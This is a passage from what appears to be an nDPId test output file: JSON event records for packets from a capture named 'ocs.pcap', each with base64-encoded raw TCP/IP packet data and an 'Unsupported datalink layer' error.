-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":195,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFKQABABoGTwKi0ArL40DbC2QBQ64tGkd7oi+uwEAutIQEAAAEBCAoANYWQRwYD3gEBBQre6JFX3uicLw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":196,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794205} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":196,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFLQABABoGSwKi0ArL40DbC2QBQ64tGkd7oi+uwEAutG5UAAAEBCAoANYWQRwYD3gEBBQre6JFX3uihmw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":197,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794247} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":197,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFMQABABoGRwKi0ArL40DbC2QBQ64tGkd7oi+uwEAutFiQAAAEBCAoANYWVRwYD3gEBBQre6JFX3uinBw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":198,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794256} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":198,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFNQABABoGcwKi0ArL40DbC2QBQ64tGkd7opweAEAvaJvgAAAEBCAoANYWWRwYECA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":199,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794320} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":199,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFOQABABoGbwKi0ArL40DbC2QBQ64tGkd7orHOAEAwHIVAAAAEBCAoANYWcRwYEEQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":200,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794327} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":200,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFPQABABoGawKi0ArL40DbC2QBQ64tGkd7osd+AEAw1G7MAAAEBCAoANYWdRwYEEw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":201,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794370} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":201,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFQQABABoGZwKi0ArL40DbC2QBQ64tGkd7ot0uAEAxiFggAAAEBCAoANYWhRwYEIQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":202,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794370} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":202,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFRQABABoGYwKi0ArL40DbC2QBQ64tGkd7ovLeAEAyPEG8AAAEBCAoANYWhRwYEIQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":203,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794439} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":203,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFSQABABoGLwKi0ArL40DbC2QBQ64tGkd7ovLewEAyPkssAAAEBCAoANYWoRwYEIQEBBQre6MIj3ujHjw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":204,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794442} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":204,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFTQABABoGKwKi0ArL40DbC2QBQ64tGkd7ovLewEAyPjV8AAAEBCAoANYWoRwYEIQEBBQre6MIj3ujM+w=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":205,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794512} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":205,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFUQABABoGJwKi0ArL40DbC2QBQ64tGkd7ovLewEAyPh+wAAAEBCAoANYWvRwYEIQEBBQre6MIj3ujSZw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":206,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794515} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":206,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFVQABABoGIwKi0ArL40DbC2QBQ64tGkd7ovLewEAyPgn8AAAEBCAoANYWwRwYEIQEBBQre6MIj3ujX0w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":207,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794572} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":207,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFWQABABoGTwKi0ArL40DbC2QBQ64tGkd7o19OAEAy89OEAAAEBCAoANYW1RwYEUQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":208,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794587} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":208,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFXQABABoGSwKi0ArL40DbC2QBQ64tGkd7o3T+AEAzq70UAAAEBCAoANYW2RwYEUg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":209,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794605} -00331{"packet_event_id":1,"packet_event_name":"packet","packet_id":209,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPDy7QABABnyawKi0AomHgzS0VhQCr\/++QwAAAACgAjkI0QcAAAIEBbQEAggKADWFuQAAAAABAwMG"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":210,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794665} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":210,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFYQABABoGFwKi0ArL40DbC2QBQ64tGkd7o3T+wEAzqMJEAAAEBCAoANYW+RwYEUgEBBQre6OKr3ujoFw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":211,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794737} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":211,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMFZQABABoF8wKi0ArL40DbC2QBQ64tGkd7o3T\/QEAzqcjMAAAEBCAoANYXGRwYEUgEBBRLe6O2D3ujy797o4qve6OgX"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":212,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794776} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":212,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFaQABABoGDwKi0ArL40DbC2QBQ64tGkd7o6BewEA0XD5YAAAEBCAoANYXKRwYEjAEBBQre6O2D3ujy7w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":213,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794802} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":213,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFbQABABoGCwKi0ArL40DbC2QBQ64tGkd7o6BewEA0XCigAAAEBCAoANYXMRwYEjAEBBQre6O2D3uj4Ww=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":214,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794831} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":214,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFcQABABoGNwKi0ArL40DbC2QBQ64tGkd7o+FuAEA1E020AAAEBCAoANYXPRwYEmw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":215,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794834} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":215,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFdQABABoGMwKi0ArL40DbC2QBQ64tGkd7o\/ceAEA1xzdQAAAEBCAoANYXPRwYEmw=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":216,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794870} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":216,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFeQABABoGLwKi0ArL40DbC2QBQ64tGkd7pAzOAEA2fyC4AAAEBCAoANYXTRwYEow=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":217,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794879} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":217,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFfQABABoGKwKi0ArL40DbC2QBQ64tGkd7pCJ+AEA3MwpEAAAEBCAoANYXURwYEpg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":218,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794880} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":218,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFgQABABoGJwKi0ArL40DbC2QBQ64tGkd7pDguAEA35vPgAAAEBCAoANYXURwYEpg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":219,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794956} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":219,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFhQABABoGIwKi0ArL40DbC2QBQ64tGkd7pE3eAEA4mt00AAAEBCAoANYXcRwYEsA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":220,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652795017} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":220,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFiQABABoF7wKi0ArL40DbC2QBQ64tGkd7pE3ewEA4mgVIAAAEBCAoANYXiRwYEsAEBBQre6R5P3ukjuw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":221,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652795091} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":221,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFjQABABoF6wKi0ArL40DbC2QBQ64tGkd7pE3ewEA4me98AAAEBCAoANYXpRwYEsAEBBQre6R5P3ukpJw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":222,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652795923} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":222,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFkQABABoF5wKi0ArL40DbC2QBQ64tGkd7pGOOwEA5UdP8AAAEBCAoANYY8RwYFowEBBQre6R5P3ukpJw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":223,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652796004} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":223,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMFlQABABoFwwKi0ArL40DbC2QBQ64tGkd7pGOPQEA5UNIEAAAEBCAoANYZERwYFowEBBRLe6S6T3ukz\/97pHk\/e6Skn"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":224,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652796098} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":224,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFmQABABoF3wKi0ArL40DbC2QBQ64tGkd7pKSewEA6BST0AAAEBCAoANYZNRwYFxwEBBQre6S6T3ukz\/w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":225,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652796173} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":225,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMFnQABABoFuwKi0ArL40DbC2QBQ64tGkd7pKSfQEA6B8w4AAAEBCAoANYZVRwYFxwEBBRLe6Tlr3uk+197pLpPe6TP\/"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":226,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652796241} 
-00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":226,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMFoQABABoFtwKi0ArL40DbC2QBQ64tGkd7pKSfQEA6B7ZsAAAEBCAoANYZcRwYFxwEBBRLe6Tlr3ulEQ97pLpPe6TP\/"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":227,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652796291} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":227,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMFpQABABoFswKi0ArL40DbC2QBQ64tGkd7pKSfQEA6B6CoAAAEBCAoANYZhRwYFxwEBBRLe6Tlr3ulJr97pLpPe6TP\/"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":228,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652796354} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":228,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMFqQABABoFrwKi0ArL40DbC2QBQ64tGkd7pKSfQEA6B4rgAAAEBCAoANYZnRwYFxwEBBRLe6Tlr3ulPG97pLpPe6TP\/"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":229,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652796970} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":229,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFrQABABoFywKi0ArL40DbC2QBQ64tGkd7pM\/+wEA6uFw4AAAEBCAoANYalRwYGpQEBBQre6Tlr3ulPGw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported 
datalink layer","datalink":12,"packet_id":230,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797047} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":230,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMFsQABABoFpwKi0ArL40DbC2QBQ64tGkd7pM\/\/QEA6uiqgAAAEBCAoANYasRwYGpQEBBRLe6VSH3ulZ897pOWve6U8b"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":231,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797048} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":231,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMFtQABABoFowKi0ArL40DbC2QBQ64tGkd7pM\/\/QEA6uhTsAAAEBCAoANYatRwYGpQEBBRLe6VSH3ulfX97pOWve6U8b"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":232,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797129} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":232,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFuQABABoFvwKi0ArL40DbC2QBQ64tGkd7pTxuwEA7b0C0AAAEBCAoANYa1RwYGzAEBBQre6VSH3ulfXw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":233,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797130} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":233,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFvQABABoF6wKi0ArL40DbC2QBQ64tGkd7pX1+AEA8JZ40AAAEBCAoANYa1RwYGzA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":234,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797130} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":234,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFwQABABoF5wKi0ArL40DbC2QBQ64tGkd7pZMuAEA82YfQAAAEBCAoANYa1RwYGzA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":235,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797202} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":235,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFxQABABoF4wKi0ArL40DbC2QBQ64tGkd7pajeAEA9jXD0AAAEBCAoANYa8RwYG4w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":236,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797207} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":236,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFyQABABoF3wKi0ArL40DbC2QBQ64tGkd7pb6OAEA+QVqMAAAEBCAoANYa9RwYG4w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":237,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797208} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":237,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFzQABABoF2wKi0ArL40DbC2QBQ64tGkd7pdQ+AEA++UQkAAAEBCAoANYa9RwYG4w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":238,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797276} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":238,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMF0QABABoFpwKi0ArL40DbC2QBQ64tGkd7pdQ+wEA++YrQAAAEBCAoANYbERwYG4wEBBQre6Xp73ul\/5w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":239,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797278} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":239,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMF1QABABoFowKi0ArL40DbC2QBQ64tGkd7pdQ+wEA++XUgAAAEBCAoANYbERwYG4wEBBQre6Xp73umFUw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":240,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797354} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":240,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMF2QABABoFnwKi0ArL40DbC2QBQ64tGkd7pdQ+wEA++V9UAAAEBCAoANYbLRwYG4wEBBQre6Xp73umKvw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":241,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797357} -00330{"packet_event_id":1,"packet_event_name":"packet","packet_id":241,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPAMUQABABslXwKi0AkDpuLyAsgG7QZiF2AAAAACgAjkIz8gAAAIEBbQEAggKADWGzAAAAAABAwMG"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":242,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797427} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":242,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANAMVQABABslewKi0AkDpuLyAsgG7QZiF2aTu9RqAEADl+L8AAAEBCAoANYbSHkOFlA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 